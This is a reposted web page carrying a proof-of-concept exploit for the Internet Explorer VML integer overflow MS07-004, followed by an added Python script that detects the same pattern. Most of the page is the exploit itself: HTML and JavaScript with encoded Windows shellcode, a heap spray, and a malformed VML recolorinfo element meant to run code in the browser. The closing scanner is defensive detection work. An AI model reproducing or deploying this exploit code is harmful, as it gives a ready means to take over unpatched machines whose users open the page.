
MS Internet Explorer VML Remote Buffer Overflow Exploit (MS07-004)

2009-2-4 13:23 | Submitted by: security


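Disclaimer: This site is a non-profit, public-interest site for popularizing IT technology. This article was reposted by a contributor from a publicly available article on the Internet, and the source is credited at the end. Copyright of its content and images belongs to the original website or author, and the views expressed do not represent those of this site. If there is any unintentional infringement or improper reposting, please contact us via the lower-right corner of the site. Thank you for your cooperation!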

Additional notes: tested on WinXP SP2 Korean version (fully patched except kb929969) & IE 6.0; sorry about that exploit hit ratio is only about 1/5.
Test environment: WinXP SP2 Korean edition, fully patched except kb929969, IE 6.0. The success rate is only 1/5.

<!--
MS07-004 VML integer overflow exploit by lifeasageek at gmail.com
- Trigger CVMLRecolorinf:InternalLoad() method
  you can see the screen captured image "http://picasaweb.google.com/lifeasageek/MS07004/photo?pli=1#5019163989136880322" which is generated by DarunGrim
- tested on WinXP SP2 Korean version (fully patched except kb929969) & IE 6.0
  and I hope it works well in English version
- sorry about that exploit hit ratio is only about 1/5
  If you have any good idea to improve reliability, please send me an e-mail with your idea
- all the java script codes scratched from MS06-055 exploit written by Trirat Puttaraksa (Kira) <trir00t [at] gmail.com> and slightly modified
- 2007.1.15
-->
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"></object>
<style>v\:* { behavior: url(#VMLRender); }</style>
</head>
<body>
<SCRIPT language="javascript">
shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
bigblock = unescape("%u0505%u0505");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<350;i++) memory[i] = block + shellcode;
</script>
<v:rect style='width:120pt;height:80pt' 
fillcolor="red" ><v:recolorinfo recolorstate="t" numcolors="97612895"> <v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" 
lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" 
bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry 
tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v:recolorinfoentry tocolor="rgb(1,1,1)" 
recolortype="1285"lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/><v/recolorinfo></html>
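
A defender-side static check for the pattern visible in the markup above, as an added example that is not part of the original exploit or of this page: it flags a VML `recolorinfo` element whose declared `numcolors` is implausibly large or exceeds the number of `recolorinfoentry` children, and long `%uXXXX` runs in the page. The thresholds, the function name `scan_html` and the sample documents are assumptions constructed for illustration.

```python
import re

# Thresholds are assumptions chosen for this example, not vendor guidance.
MAX_SANE_NUMCOLORS = 4096
MIN_ESCAPED_UNITS = 32  # length of a %uXXXX run treated as encoded binary data

VML_NS = re.compile(r'urn:schemas-microsoft-com:vml', re.I)
RECOLORINFO = re.compile(
    r'<\w+:recolorinfo\b[^>]*?\bnumcolors\s*=\s*["\']?(\d+)', re.I)
ENTRY = re.compile(r'<\w+:recolorinfoentry\b', re.I)
ESCAPED_RUN = re.compile(
    r'(?:%u[0-9a-f]{4}){' + str(MIN_ESCAPED_UNITS) + r',}', re.I)


def scan_html(html):
    """Return heuristic findings for one HTML document (empty list = clean)."""
    findings = []
    if not VML_NS.search(html):
        return findings  # VML namespace not declared, nothing to inspect
    entries = len(ENTRY.findall(html))
    for match in RECOLORINFO.finditer(html):
        declared = int(match.group(1))
        if declared > MAX_SANE_NUMCOLORS:
            findings.append(f"numcolors={declared} exceeds {MAX_SANE_NUMCOLORS}")
        if declared > entries:
            findings.append(
                f"numcolors={declared} but {entries} recolorinfoentry element(s)")
    if ESCAPED_RUN.search(html):
        findings.append("long %uXXXX run in page (possible encoded binary data)")
    return findings


# Constructed samples: inert markup only, no payload.
BENIGN = ('<html xmlns:v="urn:schemas-microsoft-com:vml"><v:rect>'
          '<v:recolorinfo numcolors="2"><v:recolorinfoentry/>'
          '<v:recolorinfoentry/></v:recolorinfo></v:rect></html>')
SUSPICIOUS = ('<html xmlns:v="urn:schemas-microsoft-com:vml">'
              '<script>x = unescape("' + '%u4141' * 40 + '");</script>'
              '<v:rect><v:recolorinfo numcolors="97612895">'
              '<v:recolorinfoentry/></v:recolorinfo></v:rect></html>')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, scan_html(doc))
```

The count comparison is a heuristic: it treats every `recolorinfoentry` in the document as belonging to the one `recolorinfo` element, which holds for the sample on this page but would need per-element parsing for documents with several.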
